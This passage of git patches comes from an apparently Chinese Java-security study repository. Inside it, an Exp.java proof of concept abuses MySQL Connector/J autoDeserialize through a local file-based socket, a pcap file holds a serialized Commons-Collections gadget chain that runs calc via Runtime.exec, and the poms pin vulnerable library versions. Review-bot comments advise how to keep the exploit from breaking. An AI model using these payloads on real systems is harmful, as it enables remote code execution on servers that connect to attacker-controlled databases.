b/JDBC/mysql/SpringTarget/pom.xml index bf38253..6f5daac 100644 --- a/JDBC/mysql/SpringTarget/pom.xml +++ b/JDBC/mysql/SpringTarget/pom.xml @@ -13,5 +13,13 @@ 8 UTF-8 - + + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + \ No newline at end of file diff --git a/JDBC/mysql/SpringTarget/src/main/resources/application.yml b/JDBC/mysql/SpringTarget/src/main/resources/application.yml index e69de29..be88d37 100644 --- a/JDBC/mysql/SpringTarget/src/main/resources/application.yml +++ b/JDBC/mysql/SpringTarget/src/main/resources/application.yml 
@@ -0,0 +1,2 @@ +server: + port: 8085 \ No newline at end of file diff --git a/JDBC/mysql/YsoserialGadgetGenerate.bin b/JDBC/mysql/YsoserialGadgetGenerate.bin index 795c3f61f528717738597e9b4c2a86449ce8f373..4bb9518bceb96e0982ff4b0b7a4b944bd5009d75 100644 GIT binary patch delta 100 zcmca3e@A|TPh==5{BH$;=-Kxyu^~svefv3#Ny)e{Gt?wjZ4k>0ddYBK>z>% delta 100 zcmca3e@A|TPoxB@FBg3`{^(AS?pJ%)uW1 f;R?a7!NH#XehR@Mjv=AJj0_B{%u*Ydn)3qy09g|h diff --git a/JDBC/mysql/final.pcap b/JDBC/mysql/final.pcap index f623356..745f674 100644 --- a/JDBC/mysql/final.pcap +++ b/JDBC/mysql/final.pcap @@ -1,6 +1,5 @@ J... -5.7.19.....F;E,-....................(QU>\#P,Q6j.mysql_native_password.......:.....!.......................root...&....av....S.M -.f..test.mysql_native_password..._runtime_version 1.8.0_341._client_version.5.1.47._client_name.MySQL Connector Java._client_license.GPL._runtime_vendor.Oracle Corporation.............................SHOW SESSION STATUS..........def..c.c.c.c.?................def..c.c.c.c.?.......................sr..javax.management.BadAttributeValueExpException....c-F@...L..valt..Ljava/lang/Object;xr..java.lang.Exception...>.;.....xr..java.lang.Throwable..5'9w.....L..causet..Ljava/lang/Throwable;L. +5.7.19.....F;E,-....................(QU>\#P,Q6j.mysql_native_password......................def..c.c.c.c.?................def..c.c.c.c.?.......................sr..javax.management.BadAttributeValueExpException....c-F@...L..valt..Ljava/lang/Object;xr..java.lang.Exception...>.;.....xr..java.lang.Throwable..5'9w.....L..causet..Ljava/lang/Throwable;L. detailMessaget..Ljava/lang/String;[. stackTracet..[Ljava/lang/StackTraceElement;L..suppressedExceptionst..Ljava/util/List;xpq.~..pur..[Ljava.lang.StackTraceElement;.F*<<."9...xp...'sr..java.lang.StackTraceElementa ..&6.....I. lineNumberL..declaringClassq.~..L..fileNameq.~..L. 
@@ -14,4 +13,4 @@ access$500sq.~......t..java.awt.EventQueue$3q.~.At..runsq.~......q.~.Eq.~.Aq.~.F pumpEventssq.~.....]q.~.Xq.~.Yq.~.`sq.~.....Rq.~.Xq.~.Yq.~.Fsr.&java.util.Collections$UnmodifiableList..%1.......L..listq.~..xr.,java.util.Collections$UnmodifiableCollection.B...^.....L..ct..Ljava/util/Collection;xpsr..java.util.ArrayListx.....a....I..sizexp....w.....xq.~.hxsr.4org.apache.commons.collections.keyvalue.TiedMapEntry....9......L..keyq.~..L..mapt..Ljava/util/Map;xpt..foosr.*org.apache.commons.collections.map.LazyMapn....y.....L..factoryt.,Lorg/apache/commons/collections/Transformer;xpsr.:org.apache.commons.collections.functors.ChainedTransformer0...(z.....[. iTransformerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons.collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.functors.ConstantTransformerXv..A......L. iConstantq.~..xpvr..java.lang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTransformer...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNameq.~..[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t. getRuntimeur..[Ljava.lang.Class;......Z....xp....t. getMethoduq.~......vr..java.lang.String...8z;.B...xpvq.~..sq.~.yuq.~.}....puq.~.}....t..invokeuq.~......vr..java.lang.Object...........xpvq.~.}sq.~.yuq.~.}....ur..[Ljava.lang.String;..V...{G...xp....t..cmd.exet../ct..calct..execuq.~......vq.~..sq.~.usr..java.lang.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.util.HashMap......`....F. -loadFactorI. 
thresholdxp?@......w.........xx......."......../* mysql-connector-java-5.1.47 ( Revision: fe1903b1ecb4a96a917f7ed3190d80c049b1de29 ) */SELECT @@session.auto_increment_increment AS auto_increment_increment, @@character_set_client AS character_set_client, @@character_set_connection AS character_set_connection, @@character_set_results AS character_set_results, @@character_set_server AS character_set_server, @@collation_server AS collation_server, @@collation_connection AS collation_connection, @@init_connect AS init_connect, @@interactive_timeout AS interactive_timeout, @@license AS license, @@lower_case_table_names AS lower_case_table_names, @@max_allowed_packet AS max_allowed_packet, @@net_buffer_length AS net_buffer_length, @@net_write_timeout AS net_write_timeout, @@query_cache_size AS query_cache_size, @@query_cache_type AS query_cache_type, @@sql_mode AS sql_mode, @@system_time_zone AS system_time_zone, @@time_zone AS time_zone, @@tx_isolation AS transaction_isolation, @@wait_timeout AS wait_timeout \ No newline at end of file +loadFactorI. thresholdxp?@......w.........xx......."... \ No newline at end of file diff --git a/JDBC/mysql/hex.bin b/JDBC/mysql/hex.bin new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/hex.pcap b/JDBC/mysql/hex.pcap index d04bd062c8b9f0c925942d776b3965ed8bb32e9a..fea6256604a2f5f090cda5b2bb2ca60f537a867d 100644 GIT binary patch delta 14 VcmX@2@la!fi^ybeMrkGnMgS=_1N#5~ delta 7 OcmaE;aYSQ-iwFP?J_7y# diff --git a/JDBC/mysql/hex1.bin b/JDBC/mysql/hex1.bin new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/hex1.pcap b/JDBC/mysql/hex1.pcap index 795c3f61f528717738597e9b4c2a86449ce8f373..4bb9518bceb96e0982ff4b0b7a4b944bd5009d75 100644 GIT binary patch delta 100 zcmca3e@A|TPh==5{BH$;=-Kxyu^~svefv3#Ny)e{Gt?wjZ4k>0ddYBK>z>% delta 100 zcmca3e@A|TPoxB@FBg3`{^(AS?pJ%)uW1 f;R?a7!NH#XehR@Mjv=AJj0_B{%u*Ydn)3qy09g|h diff --git a/JDBC/mysql/mysql.iml b/JDBC/mysql/mysql.iml new file mode 100644 index 0000000..c90834f 
--- /dev/null +++ b/JDBC/mysql/mysql.iml @@ -0,0 +1,11 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/no-outbound/pom.xml b/JDBC/mysql/no-outbound/pom.xml index 03de165..136d7a3 100644 --- a/JDBC/mysql/no-outbound/pom.xml +++ b/JDBC/mysql/no-outbound/pom.xml @@ -13,5 +13,18 @@ 8 UTF-8 - + + + + mysql + mysql-connector-java + 5.1.47 + + + commons-collections + commons-collections + 3.2.1 + + + \ No newline at end of file diff --git a/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java index 3d5261f..11cf983 100644 --- a/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java +++ b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java @@ -1,4 +1,20 @@ package exp; +import java.sql.Connection; +import java.sql.DriverManager; +import java.sql.SQLException; + public class Exp { + public static void main(String[] args) throws SQLException { + String url = "jdbc:mysql://127.0.0.1:3307/test?autoDeserialize=yes&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=root"; + String noOutBound = "jdbc:mysql://127.0.0.1:3307/test?autoDeserialize=yes&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=root&socketFactory=com.mysql.jdbc.NamedPipeSocketFactory&namedPipePath=hex.pcap"; + String username = "root"; + String password = "root"; + try (Connection connection = DriverManager.getConnection(noOutBound, username, password)) { + System.out.println("数据库连接成功!"); + } catch (SQLException e) { + System.out.println("数据库连接失败!"); + e.printStackTrace(); + } + } } 
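Review bot: The two dependencies added to `no-outbound/pom.xml`, `commons-collections 3.2.1` and `mysql-connector-java 5.1.47`, are pinned to old versions on purpose but nothing in the file says so: the serialized payload recorded in `final.pcap` in this same patch uses `ChainedTransformer`/`InvokerTransformer` from that commons-collections line, and the JDBC URL in `Exp.java` relies on `autoDeserialize=yes` with the `com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor` package name of the 5.1 driver. A one-line XML comment above each `<dependency>` would keep a dependency-update bot or a future reader from bumping them and silently breaking the PoC, e.g. `<!-- intentionally pinned: CC 3.2.1 gadget chain, do not upgrade -->` and `<!-- intentionally pinned: Connector/J 5.1.x autoDeserialize sink, do not upgrade -->`. The `<dependencies>` block starts and ends inside the hunk.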
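Review bot: `url` in `Exp.main` is assigned but never read — only `noOutBound` reaches `DriverManager.getConnection` — so the hunk leaves a dead string carrying credentials and the outbound-variant URL; either delete it or choose between the two with a command-line argument so the PoC documents both modes instead of one silently shadowing the other. `namedPipePath=hex.pcap` is a relative path; presumably the driver opens it as an ordinary file and resolves it against the JVM working directory, while the file in this commit lives at `JDBC/mysql/hex.pcap`, one level above the module, so a run from the wrong directory lands in the `SQLException` branch for a reason unrelated to the technique — worth a comment such as `// namedPipePath is resolved against the JVM working directory; run from JDBC/mysql`. The `user`/`password` pair is also supplied twice, in the query string and as the second and third arguments, and one of the two is redundant. `printStackTrace()` is fine for a standalone PoC like this one.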
diff --git a/JDBC/mysql/no-outbound/target/classes/exp/Exp.class b/JDBC/mysql/no-outbound/target/classes/exp/Exp.class new file mode 100644 index 0000000000000000000000000000000000000000..dbd3edc4bfb79e2e44c0c9c10d6d609a5dd47730 GIT binary patch literal 1882 zcmd5-OK%%h6#gcDjP2M-acEleDgkPe(%MNwNtrY)mp?7BeWXC&&cAbfX{+D?-NOC0+?&OPUR=bU@Ko4@{f z{3n2SaW#Qs$iBydT`NDP+~NaBi)4|IH} zA$rNOE&sBHP;cLohVYnEk{UV-mM!P%)n(}}iscF=>4Ia5%93y`wci(p{T0j85HHBJ zT7F`!HcSUqVc8nGdp{|xiW?$d5q3FW^j*s?4=aF#>Dab3eaoTN@jV^y^GbfKA*K_J zfG3(~#jAyhHB;7iWDu69SYODIb?Ie2U-+^rZGYPKC4JX? z$Mr@`r`ItJy@0E3R`>b$$|am}ln( zN2+mKoAa>m?H@Ov{`#;di3R0Q-{*;jV@=od%d6zW0nr{`o&|7_9>i#1kGmFce^%I{ zEM0bQS^7;LX_)OjOoRU->1$H2>5jx}3A(uMu~SJmr_Rv#d2BiP1rpt7_)=79uvfr? zVpgH1lq!n|S zq!%gG4a&ES!07Zrqi!Qkqj+GH*f+|=wl!{*SoCf zw=9V&*A#S?Y85ZxWkh(I!Yg={E0zhb;S}c(?%{R%;=dbOzQI)+QSRVPu0quR3U6^0 z#%by@&Rr&<>&WVOyXD)fqYoN~_Gu1N{OuAxezaagH@Zu#$a6|iulkt|)(b?{f(t*( IbsNt83nLxk82|tP literal 0 HcmV?d00001 From a215d303cda0789eeaef2b19ce0edaa452f64c7f Mon Sep 17 00:00:00 2001 
From: 1diot9 <2868944833@qq.com> Date: Mon, 13 Oct 2025 19:53:15 +0800 Subject: [PATCH 07/16] =?UTF-8?q?doc:=20=E6=9B=B4=E6=96=B0=E8=A1=A8?= =?UTF-8?q?=E8=BE=BE=E5=BC=8F+SSTI?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../src/main/java/com/test/pojo/Person.java" | 4 ++ .../java/com/test/study/define2Load.java" | 4 ++ .../src/main/java/com/test/study/tmp.java" | 4 ++ .../src/main/java/com/test/pojo/Student.java" | 4 ++ .../java/com/test/study/RuntimeExec.java" | 4 ++ .../src/main/java/com/test/study/tmp.java" | 4 ++ README.md | 42 ++++++++++++++++++- .../main/java/com/test/WebApplication.java | 4 ++ .../com/test/controller/HelloController.java | 4 ++ .../test/controller/vul/TestController.java | 4 ++ .../src/main/java/com/test/pojo/User.java | 4 ++ .../src/main/resources/application.yml | 0 .../src/main/resources/static/app.css | 0 .../main/resources/templates/component.html | 10 +++++ .../src/main/resources/templates/date.html | 10 +++++ .../src/main/resources/templates/index.html | 10 +++++ .../src/main/resources/templates/page.html | 10 +++++ .../main/java/com/spring/WebApplication.java" | 4 ++ .../spring/controller/TestController.java" | 4 ++ .../src/main/java/com/test/BasicUsage.java" | 4 ++ .../SPEL/src/main/java/com/test/RceEcho.java" | 4 ++ .../src/main/java/com/test/RcePart1.java" | 4 ++ .../src/main/java/com/test/RcePart2.java" | 4 ++ .../SPEL/src/main/resources/application.yml" | 0 24 files changed, 145 insertions(+), 1 deletion(-) create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" create mode 100644 
"Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" create mode 100644 SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java create mode 100644 SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java create mode 100644 SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java create mode 100644 SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java create mode 100644 SSTI/Thymeleaf/src/main/resources/application.yml create mode 100644 SSTI/Thymeleaf/src/main/resources/static/app.css create mode 100644 SSTI/Thymeleaf/src/main/resources/templates/component.html create mode 100644 SSTI/Thymeleaf/src/main/resources/templates/date.html create mode 100644 SSTI/Thymeleaf/src/main/resources/templates/index.html create mode 100644 SSTI/Thymeleaf/src/main/resources/templates/page.html create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" new file mode 100644 index 0000000..f603f37 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" @@ -0,0 +1,4 @@ +package com.test.pojo; + +public class Person { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" new file mode 100644 index 0000000..ef2c366 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class define2Load { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" new file mode 100644 index 0000000..d901a07 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class tmp { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" new file mode 100644 index 0000000..90ac535 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" @@ -0,0 +1,4 @@ +package com.test.pojo; + +public class Student { +} 
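Review bot: The new type names `define2Load` and `tmp` break the Java UpperCamelCase convention for classes (`Define2Load`, `Tmp`), and `tmp` is committed with identical content under both `ClassLoadStudy` and `ReflectionStudy`, which reads as scratch files checked in rather than study code. Rename them, or give each empty stub a one-line comment stating what it is a placeholder for, e.g. `// Placeholder: defineClass-based loading example, to be filled in`, so the intent survives until the body is written.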
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" new file mode 100644 index 0000000..c630665 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class RuntimeExec { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" new file mode 100644 index 0000000..d901a07 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class tmp { +} diff --git a/README.md b/README.md index 1867955..d036f36 100644 --- a/README.md +++ b/README.md @@ -6,6 +6,7 @@ - [Java基础](#Java基础) - [Java安全基础](#Java安全基础) - [代码和jar包调试](#代码和jar包调试) +- [查漏补缺](#查漏补缺) - [反序列化](#反序列化) - [JNDI](#JNDI) - [JDBC](#JDBC) @@ -13,6 +14,7 @@ - [Fastjson&Jackson&SnakeYaml](#Fastjson&Jackson&SnakeYaml) - [内存马&回显技术](#内存马&回显技术) - [高版本jdk下的链子](#高版本jdk下的链子) +- [表达式+SSTI](#表达式+SSTI) - [RASP](#RASP) - [SpringBoot](#SpringBoot) - [工具开发/二开](#devTools) @@ -99,7 +101,7 @@
-# 查漏补缺 +# 查漏补缺 主要记录一些新遇到的小知识。 @@ -403,6 +405,36 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 +
+ +## + +# 表达式+SSTI + +## SPEL + +[SpEL表达式注入漏洞学习和回显poc研究 - bitterz - 博客园](https://www.cnblogs.com/bitterz/p/15206255.html#语法基础) 写的比较简洁,可以按里面搭Web环境 + +[SpEL注入RCE分析与绕过-先知社区](https://xz.aliyun.com/news/8744) payload比较完整 + +[Java 之 SpEL 表达式注入 | Drunkbaby's Blog](https://drun1baby.top/2022/09/23/Java-之-SpEL-表达式注入/) 写的很详细,包括SPEL用法 + +
+ +## EL + + + +
+ +## Thymeleaf + +[Java Thymeleaf SSTI(本质为SpEL) | Godown_blog](https://godownio.github.io/2025/04/28/java-thymeleaf-ssti-spel/) + + + + +
# RASP @@ -415,6 +447,14 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list](https://github.com/LandGrey/SpringBootVulExploit) 总结了SpringBoot的常见利用方式 +
+ +## 源码分析 + +[DispatcherServlet.doDispatch请求分发详解 | Godown_blog](https://godownio.github.io/2025/03/25/spring-dispatcherservlet-xiang-jie/) + + +
## heapdump分析 diff --git a/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java b/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java new file mode 100644 index 0000000..ebd52a5 --- /dev/null +++ b/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java @@ -0,0 +1,4 @@ +package com.test; + +public class WebApplication { +} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java b/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java new file mode 100644 index 0000000..6b21971 --- /dev/null +++ b/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java @@ -0,0 +1,4 @@ +package com.test.controller; + +public class HelloController { +} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java b/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java new file mode 100644 index 0000000..e4de9a2 --- /dev/null +++ b/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java @@ -0,0 +1,4 @@ +package com.test.controller.vul; + +public class TestController { +} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java b/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java new file mode 100644 index 0000000..923a735 --- /dev/null +++ b/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java @@ -0,0 +1,4 @@ +package com.test.pojo; + +public class User { +} diff --git a/SSTI/Thymeleaf/src/main/resources/application.yml b/SSTI/Thymeleaf/src/main/resources/application.yml new file mode 100644 index 0000000..e69de29 diff --git a/SSTI/Thymeleaf/src/main/resources/static/app.css b/SSTI/Thymeleaf/src/main/resources/static/app.css new file mode 100644 index 0000000..e69de29 diff --git a/SSTI/Thymeleaf/src/main/resources/templates/component.html b/SSTI/Thymeleaf/src/main/resources/templates/component.html new file mode 100644 index 0000000..4bdcfcb --- /dev/null +++ b/SSTI/Thymeleaf/src/main/resources/templates/component.html 
@@ -0,0 +1,10 @@ + + + + + $Title$ + + +$END$ + + \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/date.html b/SSTI/Thymeleaf/src/main/resources/templates/date.html new file mode 100644 index 0000000..4bdcfcb --- /dev/null +++ b/SSTI/Thymeleaf/src/main/resources/templates/date.html @@ -0,0 +1,10 @@ + + + + + $Title$ + + +$END$ + + \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/index.html b/SSTI/Thymeleaf/src/main/resources/templates/index.html new file mode 100644 index 0000000..4bdcfcb --- /dev/null +++ b/SSTI/Thymeleaf/src/main/resources/templates/index.html @@ -0,0 +1,10 @@ + + + + + $Title$ + + +$END$ + + \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/page.html b/SSTI/Thymeleaf/src/main/resources/templates/page.html new file mode 100644 index 0000000..4bdcfcb --- /dev/null +++ b/SSTI/Thymeleaf/src/main/resources/templates/page.html @@ -0,0 +1,10 @@ + + + + + $Title$ + + +$END$ + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java" new file mode 100644 index 0000000..d77447c --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java" @@ -0,0 +1,4 @@ +package com.spring; + +public class WebApplication { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java" new file mode 100644 index 0000000..e03252e --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java" @@ -0,0 +1,4 @@ +package com.spring.controller; + +public class TestController { +} 
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java" new file mode 100644 index 0000000..a22e630 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java" @@ -0,0 +1,4 @@ +package com.test; + +public class BasicUsage { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java" new file mode 100644 index 0000000..2c69079 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java" @@ -0,0 +1,4 @@ +package com.test; + +public class RceEcho { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" new file mode 100644 index 0000000..d1f8e0d --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" @@ -0,0 +1,4 @@ +package com.test; + +public class RcePart1 { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" new file mode 100644 index 0000000..5f1f32c --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" @@ -0,0 +1,4 @@ +package com.test; + +public class RcePart2 { +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" new file mode 100644 index 0000000..e69de29 From b89c59516423b494eead44cdbc0dae5b16aaa1a9 Mon Sep 17 00:00:00 2001 
From: 1diot9 <2868944833@qq.com> Date: Mon, 13 Oct 2025 19:55:06 +0800 Subject: [PATCH 08/16] =?UTF-8?q?=E5=88=A0=E9=99=A4SSTI=E7=9B=AE=E5=BD=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../src/main/java/com/test/WebApplication.java | 4 ---- .../main/java/com/test/controller/HelloController.java | 4 ---- .../java/com/test/controller/vul/TestController.java | 4 ---- SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java | 4 ---- SSTI/Thymeleaf/src/main/resources/application.yml | 0 SSTI/Thymeleaf/src/main/resources/static/app.css | 0 .../src/main/resources/templates/component.html | 10 ---------- SSTI/Thymeleaf/src/main/resources/templates/date.html | 10 ---------- SSTI/Thymeleaf/src/main/resources/templates/index.html | 10 ---------- SSTI/Thymeleaf/src/main/resources/templates/page.html | 10 ---------- 10 files changed, 56 deletions(-) delete mode 100644 SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java delete mode 100644 SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java delete mode 100644 SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java delete mode 100644 SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java delete mode 100644 SSTI/Thymeleaf/src/main/resources/application.yml delete mode 100644 SSTI/Thymeleaf/src/main/resources/static/app.css delete mode 100644 SSTI/Thymeleaf/src/main/resources/templates/component.html delete mode 100644 SSTI/Thymeleaf/src/main/resources/templates/date.html delete mode 100644 SSTI/Thymeleaf/src/main/resources/templates/index.html delete mode 100644 SSTI/Thymeleaf/src/main/resources/templates/page.html diff --git a/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java b/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java deleted file mode 100644 index ebd52a5..0000000 --- a/SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java +++ /dev/null @@ -1,4 +0,0 @@ -package com.test; - -public class WebApplication { -} 
diff --git a/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java b/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java deleted file mode 100644 index 6b21971..0000000 --- a/SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.controller; - -public class HelloController { -} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java b/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java deleted file mode 100644 index e4de9a2..0000000 --- a/SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.controller.vul; - -public class TestController { -} diff --git a/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java b/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java deleted file mode 100644 index 923a735..0000000 --- a/SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.pojo; - -public class User { -} diff --git a/SSTI/Thymeleaf/src/main/resources/application.yml b/SSTI/Thymeleaf/src/main/resources/application.yml deleted file mode 100644 index e69de29..0000000 diff --git a/SSTI/Thymeleaf/src/main/resources/static/app.css b/SSTI/Thymeleaf/src/main/resources/static/app.css deleted file mode 100644 index e69de29..0000000 diff --git a/SSTI/Thymeleaf/src/main/resources/templates/component.html b/SSTI/Thymeleaf/src/main/resources/templates/component.html deleted file mode 100644 index 4bdcfcb..0000000 --- a/SSTI/Thymeleaf/src/main/resources/templates/component.html +++ /dev/null @@ -1,10 +0,0 